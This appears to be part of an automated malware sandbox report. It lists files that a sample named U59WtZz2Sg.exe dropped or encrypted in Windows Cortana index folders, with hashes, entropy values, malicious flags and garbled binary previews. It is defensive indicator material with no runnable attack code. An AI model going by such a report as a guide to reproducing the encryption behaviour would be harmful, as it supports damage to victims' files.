Preview:	.........Y.Y7e..09F...E$......t.....aSnS..o.oX.~.....;I.!.N...D^;b..].\|..k.um.yhW.T.....0...`..-......?:......R.'..zY_x\...e$...K.+......B..V.!J.P......>9...]gL6.).e.1c..t\..............C.....SD.H9g.C....$j.....KZ..]..K.E.K.6.V&B..o\Ax.f.G...Z..!%.u.SekV...tVu..WvTs1.^'.?.#iz4....c.......Z.c'.'/. ..t...ky^R.u..7..!..G..}.".k.fp>.f}w..D...v..F=y.P9.Y...1..J.2.B.r...&....$V.h........a..x....._.............^...e6....K...{.>.z...6.I2....D..h?V."_...l...9...9$.3,..)j-r...N.../...... .u..^L..M.j.Q.u.....@..h.gK).p......~........f.7.....L.^.I.C-.h[...BxR..0.>!.....)..3......L^mq..Z~v.D$..>.m.X.s..R......2ux.z.....Rm.[8,...Q.....lN.....,X.p.:$.<... 5=A....'.J...].....R..F..Cj7Gtdh_..;...bY.T....eb....Z...4..7.V~..e...L.o)...R7.8....qR..=..\.8......4......M[..GW.d.F.P1.:.o..%.W.aY..{.Z.......H)..Y.=...$.A...)..........,..~......t... .o...N.b.N.Y=....t8...@.5.z.5u..u.D.,.L>....K..;z.u;..+;.?.f..A.Nx...+..........H`.......Q../UX..P...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\Apps.index

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	146059
Entropy (8bit):	7.99874301630074
Encrypted:	true
SSDEEP:	3072:e9ojPCEBolV+qd1nSHxiPblE1yuuol8XPxUP9Kh+NcmGF7P:e2j6EBiVxMR0S1SolBP9I+mmSP
MD5:	38ECF4CCF0B02DD269BFEA7B8B3E6FEE
SHA1:	F07C96D63274BEE1EE192954A6ED22B54B9A6EEF
SHA-256:	51E07C5AF378B7AA6AC86D3EBC31E21EC9D5A914125CB622248072BAAE37E043
SHA-512:	9611E111305A18F54B37E92BC3CE9124177D90DFE60A47E35D00B6F96D89BF89D1B2887F85FD204A991A57F63E3871EA1B6F778080A8FEA498BD65B6D2B542A4
Malicious:	true
Reputation:	unknown
Preview:	Ej..D...:..s..a..r.. <.......o$.w..\|..N....Zf...!..\|A.:.-..sp7Q`..I..C..P.X..f...:.J.......]Gk...51.>.c .)%..bk[1.......c^...66=.%Ht.G.n..z5..-......:..C.../.:..D.f.N....G,]....wAz...\|.C..x..`d.0Y...j\|.....i.."7dK.Axah.I..}.&k...:..a...Kg...Q...@XWT.j.'./La....V..E..?..t.:eu..E..\|.Z.GC.;1U-8i.T-IV.....E..g1..bt..U..e...6Z.T.l.....=.~W../........W):}.M.l$.i..G.'`.,Z\.k...=....%.y......]?..@.M...AG.7C.~..u..5.-F..]5..m....lZ6..X.D=.].5...<.x.F-y..Og..0-Z.j.....3..V..w.iP.{..6.$..^.[..j-.a."^0v}...e....R.'.c...b.n;.....s..j..-..&.1IF.]so+......SP..z..z...U.p...t,i.v..Cd....\.N.dv.....f.Gp..?bs.b.y..}..ab..\|..f.....H.0...w.....I..'..D./..O....\|....p.#.P#.V...7.{B..q.c..Iv9.I..g.G&67.....t......56...#.;6.P.1..[.v\nY...z..{)0yFQ."h..iU.:~b...N...aCl........._.p.`.$......sc..6g...KAb...0.lQ.aG....>....k..d;_..b..@.T..........8....W..._...E.....s.F...g.h......h..ge..q...a.._......#...Z....Ul.....7P...R@....]a..r.Z.'..d..Pw. ..+.c.....Z"7.a..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\apps.csg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	614
Entropy (8bit):	7.617818363270037
Encrypted:	false
SSDEEP:	12:b94eYVOTzf59jpPHEEspR60uQsraT1Aw+f0nqNmhwLWqdVptcii9a:bdHfdPHEEspYPraxAw+fXO2bD
MD5:	95578E207394DEF046F7053142F16ABB
SHA1:	EDB15B669D4697711FC950B2B6C3BA281DC7C916
SHA-256:	C046462F94C1AFBC976180F595CE9791FF714B274EF84ABC568F757246ACC2EA
SHA-512:	654AED4E2478905DB65A379BBF4477545C7904F77B9E3F147C76C17BD86BA361964780A773C77503A24F4FB211EA36F5FA92391DAE4D8458882F831CCEA15C37
Malicious:	false
Reputation:	unknown
Preview:	......)..l.S.....}xd.]XI....1Q.vn..'j.Yl.$j.>.f6c.D.4.<\|hRNB.._....Yu.M.....6......`....P...d.hi.[..4....-.v.f..b!..dZ.s.<.!..-...w':.p.i.Z..Y.=.q.<^......5.vc....U.%...J.J.C.E..=..y..s#....i...MP.y...t.zk.......{..........h...{......g..$...h<(..n...^..k.t:d.....j.....\|4lO.n\|..ml......`I}.M..GU.?.f.pi@...no^g.............g..%T.4-..,.,9o..K.ja%....`....;..,.>.$ ..._.!.L..B.....K.mF...u.nF...84*..P`.1j:n..T.].8.xm...:0f.....).va.m.....b.>...G...kj..x....o>L..w.M..V.l$Ur.w,.3H/.UM.,.s...$..`.D.2;N.\|.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\apps.schema

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	484
Entropy (8bit):	7.448076133148547
Encrypted:	false
SSDEEP:	6:jB5L7fvuBDaqhMwxi2IPnjqFyv318KMItEF5C8bQeW00HMXWXRiBtTGxntHcii9a:jBhfvENCjqFK81I6F9bqmTstcii9a
MD5:	47E42AFCC725D72EB6882B7AFB3FF935
SHA1:	C647792A59B8B2F5156C133603383E448A7E49FB
SHA-256:	AA8E4E0AF389BE6DEDCF92334268D904C9C8688849753780461745758F52CAC0
SHA-512:	11C8F598FC53F48A9A2B67ACBD548AF30C8B0428E17A4A7FEBE2055495BBAC865FA83F3855F4A7AB1ED73A3349DAEEBB858B6F4269AFC4D51014CCF1E5739458
Malicious:	false
Reputation:	unknown
Preview:	Windo=..+'E.L...=.e....;...R..(..IFkP..6...3..<&j8Id..9..%v^#D.?..-..SH.._...>.(.^.......-......7Q7..jO.........1.,.].?r.Q.....-Zu.v.(T..9.7..".m.x...y..7.k.M)..r..J;hD..0.U..H#Y..K.....;CH.i.c.*..,................S~..2(..=R.f.n.....Z{Z.......?.\|I.H.....=ia..+.-.;w(..h..{...;`.L>.'.tD.U.V.9...Fj.k.-u..i.....)..,.D..r..a..Bz.E......2.F.B.r..C...$.;..Xay$.c.@.....K$7=..7<....!..mY..9J4.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appsconversions.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	31916
Entropy (8bit):	7.994039417777552
Encrypted:	true
SSDEEP:	768:HEt38YBSiRvRcJWIsf82n/nF1UdX7tzKQbj5KmXkY:ynobJWIsUanF1UdX7t2Qn5vr
MD5:	07725ED5310845AEA2352B98DEAC87A9
SHA1:	A35ED9F0866FAC4A7981C7C117CBA1BDE1C7DD1E
SHA-256:	A3E0BDDE8E003BB1BC46254A2992437EEA93319523CEBA6E6A657D54645CC548
SHA-512:	8993C695793CB2815803A8998CDEEE3740DCE238C60B5ABF9F1F94E01D747CB255A3E6E0DBE792E3C97A59AC36DB17776409CA2CDE6EBF908D057359DCB2BEBC
Malicious:	true
Reputation:	unknown
Preview:	markekgex;......N...%.'.......hCi.......C[.7..Y.^Y... ...".V.....[D....{.:f.qM(.(.._..2-3~...Uc.....].X....B....0..8H+.N._S.B...4n.e...,^LXO.\|.F.eQ]O.....9.s..uI..(k.MPX...p....V..+d.E..M..._.%>.>....,......B5....D.k.j.G.R....p."...xJE..E....]........S.J.h.....L..4..h.Zq>......".e.m..[J.0...<.v..S.H^.v..an.f..o.T...d({f.0.....\...._.X....W.\..rcx;.+.O(...I.o..y.)...Y.}`F[R.9...{d.....C"[\|...2qS.q+..J6j.C...^,.%0..Qx........R..[e#.4^3s........j0CB......XHN..\|..._c.}.-..._.X.v......kz..!..n...#^u.%..o.....8..wb..H.8....v/.>.V...p...ng...>...:..{;.E..8...p%.o.M.....$-...'Fh.$.k.=Nj.L..Qx..G.....)..%k.@...u6.2...Tp.....7.p1h.-.%q......:.\.......k.K.r&..#G......N....?.....AQ:.j...x....z._5...D..4FB..\....V..r.^.n....{_.$..t2..5t..m.-.)*04(Q.P9.}]..z.......W...._....z......1.....R.....%..8......@d%.9.'{..@.....>.h.....H..+?.Q.x....Hf...].q^L}$......I&dX...l.c=...%3.N...........b..q.!...%.....p .....v..q~.U...U.~V.m...\| ..b....@.(..;....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appsglobals.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358106
Entropy (8bit):	7.211494760015585
Encrypted:	false
SSDEEP:	6144:Cz4LJbpyINRXjW3Ehr32Dm1UVOJInh4alc2z:Egy6XjfypVqaGs
MD5:	6800C474453A183BB8B65006F6B3380B
SHA1:	1AC604C21C54446346F1D8C1D852D2AC92B81D45
SHA-256:	29EB81FFF8ED6B82D90CD3987357BC7C32C61D97258847E2344ECDBD55793369
SHA-512:	221871014C97D2F8F2728751C42AE7D86CABFFA3611F61C7B0ED45AA5A45E00511F6FA2BD2781315E9D1768653E7CFC6B413A724873DB3FC8E66006B2E2A614F
Malicious:	true
Reputation:	unknown
Preview:	Micro.....#...J..E..b.70.7p.Oz..].rm.E.....^....\.....rl`/m.Bs..]w...Z.}.p.s.E........C.z.+N./h.a..yr..;,z...}!.....B.....Gtzo \....Q."........... ....P!..".....6..a)....$.8..:oA?R.<.W......Ab.^.0.Y..k..J ....Q....$.F...=!s..E.#....vK#.&....\|.\..i.....h..<j...K......Eb...:>t.8.QSvY!..\~..W........A..d~.....+..P.h......!.2..b.f..C.'&l...?.p.#_.7.....BV..<.2...U.U....:38"\|x..w\..t-....w...VZj-..R.u.ZS..X.-..G....2l.b.Yl....x@.%a-z....[T.S`+.......\Z.6.H..... ....A/.....q...j.".'.....SB.t`....#.B....k7..X.k..E......R{MSO...w...9...j.U(M._...B.r.....[A.k..pz...-.?..p...%...U..f.}....2..o.:.a.&...t;B.r.N.......\...#7FOZq5..X..."-Bn...I..!...\|.\.....JV%.2....S..B.#.teP......9..~,.....Q..f...?...#..Z-Hs...!.}t5.cej.O0.};..F...U.....v..f9U..X..q[..g.:.z..k...v...h.pp.........^kn.N..p.S.y.m.M..#........4.;.l~.A ..qg.6.....fg...."(.U.&...4..../E7h...].#.t.V.0.%]_eG.D{....6...L.t*.^.%..T...C...dPuK.L....-..."puR..g.m.....I.........S..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appssynonyms.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	81577
Entropy (8bit):	7.997676060238812
Encrypted:	true
SSDEEP:	1536:WeMsorK0KR2LXzRlRlULxaYXhQtE9CmxwXIwoMxRy9j5+/b8/SM+tU+:We1orKtUX1/QxQS0P3oMxRy9j5+6J2U+
MD5:	560280E18D4841B8F54E4C7BF35B3D40
SHA1:	40FE56898CC724C23FF565337569197CD1B77D22
SHA-256:	7BEB776C7C55483D4624707D1568DBD87EE23C587B9172A4519E2310F8C29898
SHA-512:	AFB4117AB0D09D2DA21666ED6AA8D541919EE4FC28A7C793D5DB609D29FF2E3CBFE1318E064E53FCCB08260C7627B4B5756AD5AAB002768441CABD7A4A3AF9D4
Malicious:	true
Reputation:	unknown
Preview:	\|3d ...hG.-QgS.lu...^.......8...h...5(...m.....$...[...r..C:eu#..^....E.&./f.f`...&.e{...\...".B..Z.........[29G[d....'.QbX=.......F..SA..^...Z....._........(.....^..XS..7..;.1O..c^.....r!Q...vtn.O.e.7X....[.H,.......m..%!F.j`\|.....2...d....[.V..Bb....v-.'(..Z. ...#..-G(...`c@..g.b..=....-......$.....D.I.....>P....;.m.............>.{!...JsP..\|pI....M}p..~.Rx.[^y...\f.\|............6....M.(.......}H.ou.s.K.I.}..Y3?.BC.q..u..h...ou]b6.....C...H/". f....8..x..A...(.....)@.l..%L....0.Q.xQ....B.....\.7...T....9....".s..g..hY..I'..[..R...k.+7..&....F...c./.xHw.>.A...-TF....s>.....Q#..Z<>....%...`.%b...+I...,.....c..}nST......v.wl..#=(%.....^.x...6MoMS0,.)..@P.k..\=....V..(.@.=6.f8.....Q...p....^u.L.7D..u.5.<...{#.:.T..@.......W..@ 0...".c..B.S.6p4.......jx(..~..3....#.l......^......c,. ..L..c..1..h..N..]I......].q..rb.Py..W&....r....AP.G.*G..xU.(.\|<.y..u..4xgL.%.......&....f....;mW,.)... ?..b4ij.PI.{.....fW...aL%A..X...<U.&K.V4.f.5

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settings.csg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	624
Entropy (8bit):	7.611061091541419
Encrypted:	false
SSDEEP:	12:0JISfv0Po4FA5PiXqqHeo8C5gT7I6SnHKg9KV0k0z5JJIXqtcii9a:0JIevX5Pi3MC5g3EM+NI0bD
MD5:	62FA6425089BC77157655DBB70F828F0
SHA1:	4E32D0812EAEF627924D0D010C2D4B25BE8B473C
SHA-256:	E00A4882964717E5958CA25496A58066BF195FA7471361C56F3B6B3C7171EA6A
SHA-512:	6A92B7E15EC9541730B6ECE056AB5BB6AA555A59688867FD9383310F0F2DF2055486EA6675D43DDCC3AE95B662F9FFA7E91A567453A85B29B3B89EA20AD94F70
Malicious:	false
Reputation:	unknown
Preview:	.....&..&.....".N....,.l...-2.(o.t@.z ....-..mW...H.,,.u...S....YxZ..86.nV?7....?y...\.QR9j.>(V4.(..{...[..f...z... J...,.q.H. ....6..^.O.f.ZS...d.$..ta#E9....*.y...]i....M.N..xe....D4q%...<.b.=&z..X.\|.Zo.....!T.c.+li.fF...!.G....8L.oI..k.gmE`..i..............#.....&0D.....^.......9....V...Y.H.L...J...s.VO.m....^.XcCo....+.>0q..c>.D\...J2...ERO....G......+G............Ef.RVn...:...\1...~t.f......V.?I...!.sb.'.kc.D....x..P.....K..V..el....,r..\|.D..ZR...M.J...cQ.rY$..s...m.e.an.N.t.t......1.../;..f...`[.3;X6K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settings.schema

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	496
Entropy (8bit):	7.596582628117039
Encrypted:	false
SSDEEP:	12:jBQhp8Sy73tACeueP+o6ku2wmRJ8gvqvXlJjeRWQ0hRHtcii9a:jBQC79ro6F2wkyWqv1tkAtbD
MD5:	C626FCA5DCD1F4B377E1F4BECB982522
SHA1:	13B49631FFC76459B400CF3B68B667530AC2816F
SHA-256:	084CF8D0C3551AE12C7F992113BF34775B4C00FED01AB35CCC79913D1DBA0113
SHA-512:	B6B7DCEAA3D11590F0C7BD50113365B5D2B3C9B83B9F5B037AD1DCAC596EDE3363DBB8D9DE62CE3F63F11EF11AC86E37E0870EA06C0921F9193A1DCD478F50C8
Malicious:	false
Reputation:	unknown
Preview:	Windo.@.[{....l..i...^..h............<6...;.....a....:.h.QRT..]......%.R..........WL..O...`..~}L..u...q.}..zc`"r.....'...........D.M.q=zq........!\..o.`.&..~...p@D...I.........v.>.v..AR..jV.O..c.?....../...e...CTI.F...s.N.`.TO..s......*..A.~f=W.q:...U.....M..A+.~...r.C.uuf.C5I........p.K..1..UMm..bl7.<G..ap.....A..........P.....9....~._t.K.t@.8..m.C...q...s....?...p....&......},.y....v.x.eK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingsconversions.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	31916
Entropy (8bit):	7.995035611347041
Encrypted:	true
SSDEEP:	768:Dt7OYRq9I2rgyyH/qz4tRZN34K1usQFPgIDCpeWalG2:VOYRqq2MX1tR3sbFP/Dwedn
MD5:	67F8A4FB9D3F92E9AF88AEC47D448B98
SHA1:	3E0249137A58018C40C7CBA721C33FD10D08E48C
SHA-256:	91D41F47B6DBD0E8962237DA5BF488CE34EBAB8E3B72543D876382375B78014B
SHA-512:	A1989B43FE024E29D08EBDE2DF52A0DC73C4EEC4FA763726DF530B4A10732839CCE55EDDD4F0452618FA2C6F87D55469AF51EFDC74460915D04F69ADA1FE4CB3
Malicious:	true
Reputation:	unknown
Preview:	marke\.8!..c..y.....iF......b .r.?.&.I4.). ...y. ........g......7rr..,..ArR.........F.3........_..2.ZI..n.Z..B..w....4..f..C.....(.......s..9.4....9k.x..Q-t.QNa=.....W..R{}.el.h.}L.D...6.'v.>-Q.E..+..f....u.7......OJX..^.i.....)......2.M.NW&...v./hQ.EG..l..Rdy....\|.H......X...D.5zBM.R........te.L....Q.6#}yK..B;....n_.m...+Y8_6.L....&..../_...Zk....^y..5..'..T=.t.'$].wd.u.......c)s.m...y..tX-^Z..9v..2.W..W....\ .M..~X.I...2F...C.EH.....h2.....://.K......Y.{6....l.'..(6.OT]_.....w.9....p..Q9^........'.!.......K../....1Ej....f..(21.mH%A`m.6\|...W........0B....q..;.F.T1dJ.7.....8....N.M...*.....FK...Yb...8+.....}.q..^..x.SVLX..A...?()..(.z.%.u..uc&..p...[...\....4w..hM..y......O.d.Bg#..@.9.7G.Vsda...B...s .UD..N!..Zq..4.......N.p3......67...h.#.............q..2...C..=HC..........B;.H)N\|....b@..(... L..](........S....o5.#$.X.z]...=..$.D.L.gg.m.....q..."g...........I......qq.z...J..(.z..7;...: .G.....k...6_Z.Wa..8.\\...Ox.#.4V,I.:..G...L..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingsglobals.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	40813
Entropy (8bit):	7.99501594320368
Encrypted:	true
SSDEEP:	768:4sAFakMrXm92LzehvjzQAcbcdAxvTS83EY0qArzYJHeWBLLDQ8lU9:4VaI2LzeVvQZc2vW1Y0qOsHZvJ2
MD5:	6D2BE12CC21B6E4ABABA8A48BA42FFAC
SHA1:	0CF75B47A57A36A6402EB99D6DCA3BFC077F9102
SHA-256:	F9DA69B0998F9A7F76753874A7BF4339092BCAAE17CBAACFE48A09E0D9147346
SHA-512:	60B77E3004CF6D1B318FD8724F92EDE35B87A69472BFB2E5CBC39BBD0C30C534241F062DC7EDD1575A2720089C810E8063FB78A5E77812D38010CB7BE1ACE0CB
Malicious:	true
Reputation:	unknown
Preview:	ClassI.iB~a.o...b....Tn..Z.. !.>\|...Y.x<.......I...#.\|.kJt.eX....RFw....!/...#.......[......k..$F5T.L. .Y[._.F..'........#y......q..C}.jd.......e.@M.@u.O...JE.<...v....m?.7qF.O..D.4.....a.ui0.C.Q......W"........c8..!..00...HV..4...%.-a?......#...3..?.y<(7....O.#+{..;.8A..h`-.}.8.W...+..R.=.0'zYpB.k....a..."^m..h..(..?n`...q......_x....}p.......v@...c"F;....^.{2..#...-....}..BS..%.N.F".]..\|e..JV...:....}x....6....E....eU..DE.?s)KDr.g.>..f(.z.....w...Q..q....i..!...2~o.O]s=.9.qB..\B..%."[5..!...jJ..J.b..]y..G:.IW. ...u..VQ.n!.@...~.....e.H...&.....]..UP..x*..&.G.vYlF.N.=jO#...U.)...5...bJ..wp..w..^.6_=$LO...Yoh.y.._.i>\|.v`+4.Qd.yl.._......~..#.0.C\|}.0hb..j.)e.4.............&"8......J...w.%.I;../........y)...#..X+D.O#..1H...T.D...\.H<M...w..5}.. ..N.4G3.n@UD>....~.......?\|..\|.(.8HJt..P..Y..J..8.5.....N.W..........E.@u..D.n$..[/K.&../.-.:I...]..f....O.=..u.,...9.....h!4.Bp.....WPH..Q%?=...u8..O..QB...~. .8.2.%.v......Y.`...@.!y.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingssynonyms.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	76900
Entropy (8bit):	7.997617443701289
Encrypted:	true
SSDEEP:	1536:sQedMw4vEmCfnlGaS/2yGj6ArvRya+Pu4EGc3OU7+FcC:xedMw4EmCYK6ArvsNuWvZv
MD5:	026966A8D9D46E3637FF0DBEF97D89DA
SHA1:	446A8501A1C714411496F549C363F8C0F059111B
SHA-256:	2BA92FEF0265FACCEBC773EE90B9F0AAAC45F41FB889DBA6F7DFBC6C87A799D6
SHA-512:	71BD49968C55B7C81B5B6C3568557BFC51DD4E677B061C4179FA7F1291DE04B58E41A0F6519793BC9C6225C08E3C9DDDEEAD3DD682ED820F72B56B5B2CEB73C5
Malicious:	true
Reputation:	unknown
Preview:	\|aboG...J.m`].3.."...~q.O....N.0.*...l.=."?..Q.3(..^.9r..#..@....a[..%}d.K.@.@..63....a..K._t.X0....!..P../..w.A.Q..Sk&..2.....g....uQ....cI.t..D...b!.T.~~k.f...Y..S..._.!+u/'.-.qM.....02/..X$M.t..Y...{..S.W1.[..O..I....j.4....0..>..\|L.R...P.u...JT..#. 9.3}.M...7.~).?..~8nY2.b....V.D....+\.DB.n..:...B.yy).n.s......j.!y..9...b.zK.q...%..U#k.+....aw...N.&..V...e..'... .(W^.uY.RR.].\,..8a..Y`........t..6<..x)9.77.6p...D..v.......ZIa...t......x[<^..._l1b...l./.....pN.z....@R.V.^m....a.}......Lg.C..".....%..'~3l.x.....9.P....)U.!.....YA@E.k5~..i..\..MV...sF...K.j..A....O..0.4I..........RD...Q^........}..i.t.8^2.&..T..z-.[....H6k.D..r7..LJW..g..j .1.D....6...8.......L\]O.9R.5i}..\r..[>........z.)G.s..?./.m.?..t.....1XU.R##rr...B.95...$~.k\.+..].Z[..5.0..`.4.u..<...ze:...=X.R0)..S.[..:......3g..r....-t.....s..%.8b..20.I.L5\|.p.......S..&...>.,0.a.........y:.Kc.<.a4.b......D.K....0...'$...K..9\|.J.......A...h..nc)tUe..GJ[..,/].....5...%....S..a

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{13d888a1-0da9-488d-b29e-c632055a5b8d}\0.0.filtertrie.intermediate.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	111679
Entropy (8bit):	7.998433940494352
Encrypted:	true
SSDEEP:	3072:Xe1gUX7ZZ0aQaNfY6TbVQ0FbwJw2Zg1qa4VN+M2oxrC:+gMPra6TbZigd1KC
MD5:	E57CA86A45344E53B2E0FB1EBB290F36
SHA1:	C3E1142B646392ECD2A1D8C6EBDA6DC70DE3EA05
SHA-256:	3FB3702B88A05D9937B78B2746DD5C9CD9286B10BE2C9B23555642DC217E0927
SHA-512:	B483B37193EBE01DF7BFF3AEE52A3BF6CBE83599EFAAD7AFD97B40F1CC4DB75B0E2795833E3C770EDD8D707F1914FF6C47398A20296314EC098D7697C34049EF
Malicious:	true
Reputation:	unknown
Preview:	0.0....d..$.\|...3.........6ngK..pX<Y.Ov...+.W...ot..%.D...^.o:.......j....k...D_.6... ...Z0.@..w.....F{k3u.ZjY....}..Z.....d>....k'qS=YP.{.x..{}....:..3....l.Ri..6..\|.q...$......E;fV...,1....m\.X...G"WB...f.....,...Sy]...F...,....^.....q.j..$....y._5~.7..b@.5...Z.8,..o.W.&e......$;.m...l.;)..e..]5..=..-..J...c....'.}.....kt..Fy.Ld.!q%...kB.\|Jb&...;....w1..-f.e....0(F>S.{T.U}..a......(..0...]cO..+...5.x....)..U..,._.....O?.<.../.{..Ra..~...5J&.c..M.&.Z...\......z.r.....L..4..^.\..>.k...Dcj..FD%C..M.]].(.%...J....I.....5............)7l......CC...gx...Z....Q."......0U.p...6Z..$.a.YV..F....\|......@R&}s.k)..F.......Wb[.q.HU.G..).7..8.......(.!kq.\|..\.T....0.F...a.........z.S.W..-......v..{.....=......6 k....h\...S.;Q.v3...d..3H.....@O.....I(=....j....H..L.y..>d.o.\4.O.[......q......M.E....).!.Y..oV.7..b.I.7......e.8...Y.t...,Q.......!...;..{.d.\.?...e.jU.E%.2..8.....{...Q..t.>....=..9...K..xX.^E..#.<.u_.3..o{=.n.....<....b...{H....~.[.]..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{13d888a1-0da9-488d-b29e-c632055a5b8d}\Settings.ft

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131698
Entropy (8bit):	7.9987476515882445
Encrypted:	true
SSDEEP:	3072:TC1i8A8ox4YUQaf8RANHiznm2odcNRShXV/C:mUD8ox4FjNHiLD3WC
MD5:	51EBEEDDAB54806991CE63E17044FF9F
SHA1:	60712B8C18037AB2C0340CD71EAD17598D763345
SHA-256:	049E52CAD39C58EA89315DFCA117800CD00FDF669F7B900D4BC93B4ADE5A8130
SHA-512:	87705B99688B12B6603B6F5215336CC0F522AE3BB1B25DAB8C4B32404BB9DF9EEBEEDA87534D49A300F38A6E79DCDA2E879114BF061EA2F8FA1334F5984C8366
Malicious:	true
Reputation:	unknown
Preview:	.....n....hU@...H....S.K.?.s.. 8x/.).c.3b..K....$...p3>\%...<..lw.E..c..{O.w..:....................d....d..^..f..-...R.5....(..F.Y..S.W.........9&N...bq..@....f.[...SV.KdE..2..s.\|.........%..?...-Au...W..8...w......{.z=.l...nim.'......Y...WV.n....:.`az.4........fT.Q?..............ka.s.....9.....n....93c.2CQ..._...:.r...x.........iZqC.`T..^b~.S'.O....R.`....b#..../..........+.z..v...~...UZ.._...Gy.5.c.4.0.3Z....s....,K\"...2C..f........n...}[.(h.....a.r'd".Ki.1.....).4.U.4..{}...W...t........4.....oyzd0v.L.........6...p..u.j...J.b#..20M..k.".J......{zV?..U....#.....k..@.F..q....!2.....a.<...sU.R..q.{..8._..).j.m(.>t..YO...6....".]T6.K)..4`..F.b...........F..(.....`J..4.ewK.d.;.d....5.F]47.u.%y..)~Br....\|.%.u...g[...i..;..p..>F.v.6.Z........1."-..X.}(....>I.W7...S..c.eY....<....."_.....AZ.....B....I.........f...}.<....'.....t....a\..3..T..X...,d.Z......Rn...s.[#...k.P.......i.z.....\..*.....).d..W..$.Qn..C..J.Z.R.yOB._pHEK;...c.p(.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{13d888a1-0da9-488d-b29e-c632055a5b8d}\Settings.index

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	640139
Entropy (8bit):	6.409887859652816
Encrypted:	false
SSDEEP:	12288:vxdxB5YQPEiAWyG1SlB0ugsFXElYvWKU9Reat2EfX:vPxbYQPJhyG1STwRlrKU9Rey2EfX
MD5:	D2B960657C8C77C40AD5FE59EF87274C
SHA1:	AFF2FDA633089667E31543531698AA24FE2DE6D0
SHA-256:	3205CE7552C1B3A98EAB9735BF36612EB099897BFBB0ED0EC7EFFFE43335EF50
SHA-512:	BD0C4E745958B13A7EB3AF0B3E23FA814E503C93B24E40EA9E2A5EB75E83A241AD6380F8B16585A9D3C0981F347D0A045E8F1F35B3D3323785E143D9404CD87E
Malicious:	false
Reputation:	unknown
